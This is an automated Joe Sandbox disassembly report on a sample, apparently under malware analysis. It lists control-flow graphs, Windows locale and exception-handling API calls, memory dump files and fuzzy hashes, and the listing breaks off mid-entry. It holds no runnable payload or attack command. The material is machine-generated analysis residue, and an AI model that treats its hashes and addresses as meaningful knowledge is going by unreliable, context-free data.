                                  • Instruction ID: 3dd67c202991466b1d96b44d01324378ce198562f11936ec5c5e6c452c1684cd
                                  • Opcode Fuzzy Hash: e14504b0b31b793bb4a31330bd1bd75779d4f2d380c92be4b9d160339a94d1d0
                                  • Instruction Fuzzy Hash: BA512570A002499EDB20DF76C8416BBBBF5FFC1304F14446FD29687251EB789A46CB98

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 183 4ef442-4ef451 call 4eef74 186 4ef47a-4ef494 call 4ef49f LCMapStringW 183->186 187 4ef453-4ef478 LCMapStringEx 183->187 191 4ef49a-4ef49c 186->191 187->191
                                  APIs
                                  • LCMapStringEx.KERNELBASE(?,004F2ACF,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 004EF476
                                  • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,004F2ACF,?,?,00000000,?,00000000), ref: 004EF494
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: String
                                  • String ID:
                                  • API String ID: 2568140703-0
                                  • Opcode ID: a91e6475bea2361847bbb1f843bc501dcb8d2d10fbd5c249508ec43dd6fc7d64
                                  • Instruction ID: 3677924b9da7aaa2c4ce613986e76b42b335cc406bf464a5e366d99aacd506b7
                                  • Opcode Fuzzy Hash: a91e6475bea2361847bbb1f843bc501dcb8d2d10fbd5c249508ec43dd6fc7d64
                                  • Instruction Fuzzy Hash: 7CF0683250025ABBCF125F92DC059DE3E66BF583A5F058125FA1925160CB36C932EB99

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 192 4f4903-4f4925 193 4f4a3e-4f4a64 192->193 194 4f492b-4f493d GetCPInfo 192->194 195 4f4a69-4f4a6e 193->195 194->193 196 4f4943-4f494a 194->196 197 4f4a78-4f4a7e 195->197 198 4f4a70-4f4a76 195->198 199 4f494c-4f4956 196->199 202 4f4a8a 197->202 203 4f4a80-4f4a83 197->203 201 4f4a86-4f4a88 198->201 199->199 200 4f4958-4f496b 199->200 204 4f498c-4f498e 200->204 205 4f4a8c-4f4a9e 201->205 202->205 203->201 206 4f496d-4f4974 204->206 207 4f4990-4f49c7 call 4f28d8 call 4f2bcf 204->207 205->195 208 4f4aa0-4f4aae call 4e4713 205->208 209 4f4983-4f4985 206->209 218 4f49cc-4f4a01 call 4f2bcf 207->218 212 4f4987-4f498a 209->212 213 4f4976-4f4978 209->213 212->204 213->212 216 4f497a-4f4982 213->216 216->209 221 4f4a03-4f4a0d 218->221 222 4f4a0f-4f4a19 221->222 223 4f4a1b-4f4a1d 221->223 224 4f4a2d-4f4a3a 222->224 225 4f4a1f-4f4a29 223->225 226 4f4a2b 223->226 224->221 227 4f4a3c 224->227 225->224 226->224 227->208
                                  APIs
                                  • GetCPInfo.KERNEL32(E8458D00,?,004F4B52,004F4B46,00000000), ref: 004F4935
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: Info
                                  • String ID:
                                  • API String ID: 1807457897-0
                                  • Opcode ID: 0fecab33a6350a8d119962674bee2b946a13fdf3d18fe0b76831155d49eead2c
                                  • Instruction ID: bae004c26c37f60546eb4e6552daaeb9446bb1fd969d314eb7b5d0b374ca66d1
                                  • Opcode Fuzzy Hash: 0fecab33a6350a8d119962674bee2b946a13fdf3d18fe0b76831155d49eead2c
                                  • Instruction Fuzzy Hash: 9E515DB1A0415C5ADB218E28CD80AF77BBCDB96304F2401EED69AD7142C7799D46DF28

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 228 4ef073-4ef09b 229 4ef09d-4ef09f 228->229 230 4ef0a1-4ef0a3 228->230 231 4ef0f2-4ef0f5 229->231 232 4ef0a9-4ef0b0 call 4eefa8 230->232 233 4ef0a5-4ef0a7 230->233 235 4ef0b5-4ef0b9 232->235 233->231 236 4ef0bb-4ef0c9 GetProcAddress 235->236 237 4ef0d8-4ef0ef 235->237 236->237 238 4ef0cb-4ef0d6 call 4eb82a 236->238 239 4ef0f1 237->239 238->239 239->231
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 893ddd73d7263c9530b1603ffad0a00200fa57fba1e363da0c03a3904a8e7649
                                  • Instruction ID: 2e43000173f5143b706189238fca945af932d6cfcad9cc76c83271bc7e498855
                                  • Opcode Fuzzy Hash: 893ddd73d7263c9530b1603ffad0a00200fa57fba1e363da0c03a3904a8e7649
                                  • Instruction Fuzzy Hash: F90168333002519F9B21CE2BEC0185B33E6FBC53227248036F901CB285EA39DC099795
                                  APIs
                                  • GetLocaleInfoW.KERNEL32(?,2000000B,004F78B4,00000002,00000000,?,?,?,004F78B4,?,00000000), ref: 004F762F
                                  • GetLocaleInfoW.KERNEL32(?,20001004,004F78B4,00000002,00000000,?,?,?,004F78B4,?,00000000), ref: 004F7658
                                  • GetACP.KERNEL32(?,?,004F78B4,?,00000000), ref: 004F766D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID: ACP$OCP
                                  • API String ID: 2299586839-711371036
                                  • Opcode ID: 6cc7dcdc49315342e4f9de4281d998c3154456ab795707b211f07c4a747e3205
                                  • Instruction ID: 860d4efa18ddd0b0924492a3835041cc0c5f06324212682b846ac1595ed47db2
                                  • Opcode Fuzzy Hash: 6cc7dcdc49315342e4f9de4281d998c3154456ab795707b211f07c4a747e3205
                                  • Instruction Fuzzy Hash: 1421B821608508AAEB348F19D904BB772A7EB54FB4B568426E70AC7710EB3EDD42C35C
                                  APIs
                                    • Part of subcall function 004EEA50: GetLastError.KERNEL32(?,00000008,004F2F56,00000000,004E8E50), ref: 004EEA54
                                    • Part of subcall function 004EEA50: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 004EEAF6
                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 004F7877
                                  • IsValidCodePage.KERNEL32(00000000), ref: 004F78C0
                                  • IsValidLocale.KERNEL32(?,00000001), ref: 004F78CF
                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 004F7917
                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 004F7936
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                  • String ID:
                                  • API String ID: 415426439-0
                                  • Opcode ID: 84cb5ed32be71522facbbfff427d59e3977a8e86933ca50f23eeb1cdc0db41a8
                                  • Instruction ID: ed88797451b8805f5707785ec38eb28e44832824be6b0f99df645cea27c2c334
                                  • Opcode Fuzzy Hash: 84cb5ed32be71522facbbfff427d59e3977a8e86933ca50f23eeb1cdc0db41a8
                                  • Instruction Fuzzy Hash: BC519171A04209AFEB10EFA5CC45ABF77B9BF04740F14442AEA01E7291EB7C9905CB69
                                  APIs
                                    • Part of subcall function 004EEA50: GetLastError.KERNEL32(?,00000008,004F2F56,00000000,004E8E50), ref: 004EEA54
                                    • Part of subcall function 004EEA50: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 004EEAF6
                                  • GetACP.KERNEL32(?,?,?,?,?,?,004ECA5C,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 004F6EC8
                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004ECA5C,?,?,?,00000055,?,-00000050,?,?), ref: 004F6EF3
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 004F7056
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: ErrorLast$CodeInfoLocalePageValid
                                  • String ID: utf8
                                  • API String ID: 607553120-905460609
                                  • Opcode ID: e77b5c18e222db7390d548bdd3d9da7810ee75ee44c325311cc9f60c8fbcc34f
                                  • Instruction ID: bfcbbf47899f46ca7af956bfebcedc02c40d9342279a8d610618e4cc97e93452
                                  • Opcode Fuzzy Hash: e77b5c18e222db7390d548bdd3d9da7810ee75ee44c325311cc9f60c8fbcc34f
                                  • Instruction Fuzzy Hash: 1971D77260020AAADB24AB36DC42B7B77A8EF44704F15442FF706D7281EB7CE9418769
                                  APIs
                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 004E4D72
                                  • IsDebuggerPresent.KERNEL32 ref: 004E4E3E
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004E4E57
                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 004E4E61
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                  • String ID:
                                  • API String ID: 254469556-0
                                  • Opcode ID: b8e5674774802f4149373045c21124f69b5d5b3637a6b301706219299bcae827
                                  • Instruction ID: 61adcd050349baddc2c21714797cb9ead7d526a96001cf1d87ddd87a20805316
                                  • Opcode Fuzzy Hash: b8e5674774802f4149373045c21124f69b5d5b3637a6b301706219299bcae827
                                  • Instruction Fuzzy Hash: 97311675D05228DBDF20DFA5D9497CDBBB8BF08305F1041AAE40CAB250EB749A85CF48
                                  APIs
                                    • Part of subcall function 004EEA50: GetLastError.KERNEL32(?,00000008,004F2F56,00000000,004E8E50), ref: 004EEA54
                                    • Part of subcall function 004EEA50: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 004EEAF6
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004F726E
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004F72B8
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004F737E
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: InfoLocale$ErrorLast
                                  • String ID:
                                  • API String ID: 661929714-0
                                  • Opcode ID: f45e8a9ce2e23d164c8551cca6d7b3c46d2b7d8226983528995eecaeaafbc98a
                                  • Instruction ID: 36abf2267d26aceaa68419d4f2a326957d4fce8fcdf1d73cea235fb99907d267
                                  • Opcode Fuzzy Hash: f45e8a9ce2e23d164c8551cca6d7b3c46d2b7d8226983528995eecaeaafbc98a
                                  • Instruction Fuzzy Hash: 0861707154420BABDB24DF29CC82BBA77A8EF04304F14407AEE05C6685E73CD945DB58
                                  APIs
                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 004E8DCB
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 004E8DD5
                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 004E8DE2
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                  • String ID:
                                  • API String ID: 3906539128-0
                                  • Opcode ID: 96f830008991444f0fc5df9511cc1cf751bc1ad2622ad09cfa585a46701ce623
                                  • Instruction ID: d06853a39a722bd5455365a8d74c4f9b99cba6f8133b6ed4faaab8476c0d2784
                                  • Opcode Fuzzy Hash: 96f830008991444f0fc5df9511cc1cf751bc1ad2622ad09cfa585a46701ce623
                                  • Instruction Fuzzy Hash: AC31D5749012289BCB21DF65DC8979DBBB4BF18315F5041EAE40CA7251EB749F818F48
                                  APIs
                                    • Part of subcall function 004EEA50: GetLastError.KERNEL32(?,00000008,004F2F56,00000000,004E8E50), ref: 004EEA54
                                    • Part of subcall function 004EEA50: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 004EEAF6
                                  • EnumSystemLocalesW.KERNEL32(004F721A,00000001,00000000,?,-00000050,?,004F784B,00000000,?,?,?,00000055,?), ref: 004F7166
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem
                                  • String ID: KxO
                                  • API String ID: 2417226690-2181764300
                                  • Opcode ID: 539ff4195afdc0c0ebd2f53568824257c04519c4f4e5c6aa64075389d7a15a2c
                                  • Instruction ID: ba56fa12d36eab429dcd774302922a53e9ea80ff63baa4053078fe41cef2e820
                                  • Opcode Fuzzy Hash: 539ff4195afdc0c0ebd2f53568824257c04519c4f4e5c6aa64075389d7a15a2c
                                  • Instruction Fuzzy Hash: D01106366047055FDB189F39C9A167BBB91FB80358B14442EE64687740D779A906C744
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3c3b630824c0e20bd1bcfe9e794ccb396f88b9ceef15560a2c7fa61ba2e65a45
                                  • Instruction ID: 19791166a4e2555571c2edcaafd3ad1be0c124d3a57e95160dbab102905b60b7
                                  • Opcode Fuzzy Hash: 3c3b630824c0e20bd1bcfe9e794ccb396f88b9ceef15560a2c7fa61ba2e65a45
                                  • Instruction Fuzzy Hash: 6141B4B580421DAEDF10DF69CC89ABBBBB9EF85304F1442DEE518D3201DA399E448F24
                                  APIs
                                    • Part of subcall function 004EEA50: GetLastError.KERNEL32(?,00000008,004F2F56,00000000,004E8E50), ref: 004EEA54
                                    • Part of subcall function 004EEA50: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 004EEAF6
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004F74C1
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: ErrorLast$InfoLocale
                                  • String ID:
                                  • API String ID: 3736152602-0
                                  • Opcode ID: 57f440bb1a6ac3958d5e4fd53426837b9f002d49aa7f82841c45820fc43ade62
                                  • Instruction ID: 28816543a8e7ce1cabcd72767dccc4de1679e7f8a7adfc4539e00cfe3e5a8445
                                  • Opcode Fuzzy Hash: 57f440bb1a6ac3958d5e4fd53426837b9f002d49aa7f82841c45820fc43ade62
                                  • Instruction Fuzzy Hash: 8921907160820AABDB289E26DC42A7B77A8EF05319F10507FEB02D6641EB3CED048658
                                  APIs
                                    • Part of subcall function 004EEA50: GetLastError.KERNEL32(?,00000008,004F2F56,00000000,004E8E50), ref: 004EEA54
                                    • Part of subcall function 004EEA50: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 004EEAF6
                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004F7436,00000000,00000000,?), ref: 004F76C8
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: ErrorLast$InfoLocale
                                  • String ID:
                                  • API String ID: 3736152602-0
                                  • Opcode ID: 717ba3ee4fb77ea506dccc0afc01da8d40099843651a78f56335941b063d2a15
                                  • Instruction ID: 1d6229b0a271a168a8322fe19f5e54dc18ee60d2ad35e4768bd8a9114e62310a
                                  • Opcode Fuzzy Hash: 717ba3ee4fb77ea506dccc0afc01da8d40099843651a78f56335941b063d2a15
                                  • Instruction Fuzzy Hash: 0EF0FE325141156BDB245655C8056FB7754EB40354F14042ADE16E3240EA7CFD01C594
                                  APIs
                                    • Part of subcall function 004EEA50: GetLastError.KERNEL32(?,00000008,004F2F56,00000000,004E8E50), ref: 004EEA54
                                    • Part of subcall function 004EEA50: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 004EEAF6
                                  • EnumSystemLocalesW.KERNEL32(004F746D,00000001,00000000,?,-00000050,?,004F780F,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 004F71D9
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem
                                  • String ID:
                                  • API String ID: 2417226690-0
                                  • Opcode ID: 5cc9490ebeca2c8d1d0be8e39cea3dca7a466827638a0e41586c81c30cba7762
                                  • Instruction ID: de454af7c6a58bbcef87b8d405a062ce6159f6a457a4792de2934551560e2a8a
                                  • Opcode Fuzzy Hash: 5cc9490ebeca2c8d1d0be8e39cea3dca7a466827638a0e41586c81c30cba7762
                                  • Instruction Fuzzy Hash: C2F0C2362043085FEB145F769C81A7B7B95EB80768F15843EFA068B780D6B9AC46CA58
                                  APIs
                                    • Part of subcall function 004EA676: EnterCriticalSection.KERNEL32(?,?,004EE728,?,005056A8,00000008,004EE8EC,?,?,?), ref: 004EA685
                                  • EnumSystemLocalesW.KERNEL32(004EEDD2,00000001,00505728,0000000C,004EF201,00000000), ref: 004EEE17
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                  • String ID:
                                  • API String ID: 1272433827-0
                                  • Opcode ID: 7416e99af4e98fdbcd512d5afc14a955f660980b4d3eb90ba40ff5f707ced376
                                  • Instruction ID: 64185a46660f2e8a16c9413f8fda54f33d2f5171892847c5bf36404db71cef4f
                                  • Opcode Fuzzy Hash: 7416e99af4e98fdbcd512d5afc14a955f660980b4d3eb90ba40ff5f707ced376
                                  • Instruction Fuzzy Hash: 4DF03C32A00340DFD700EF9AE842B5D77F0FB4872AF10412AF4019B3A0D77959449F89
                                  APIs
                                    • Part of subcall function 004EEA50: GetLastError.KERNEL32(?,00000008,004F2F56,00000000,004E8E50), ref: 004EEA54
                                    • Part of subcall function 004EEA50: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 004EEAF6
                                  • EnumSystemLocalesW.KERNEL32(004F7002,00000001,00000000,?,?,004F786D,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 004F70E0
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem
                                  • String ID:
                                  • API String ID: 2417226690-0
                                  • Opcode ID: 0ce673d25fbfe72c012b3c776a1e18e0b664d4da21e651f4e10dedca6bb076e2
                                  • Instruction ID: 97c60d57c6ad54f43b2f0646a152ecddb945d3296f5ac491dde947c9af9fe6b8
                                  • Opcode Fuzzy Hash: 0ce673d25fbfe72c012b3c776a1e18e0b664d4da21e651f4e10dedca6bb076e2
                                  • Instruction Fuzzy Hash: 7CF055363002095BCB049F3AC84577B7F90FFC1724B06406EEB0A8B241CA7A9842C798
                                  APIs
                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,004ED5C2,?,20001004,00000000,00000002,?,?,004ECBC4), ref: 004EF339
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
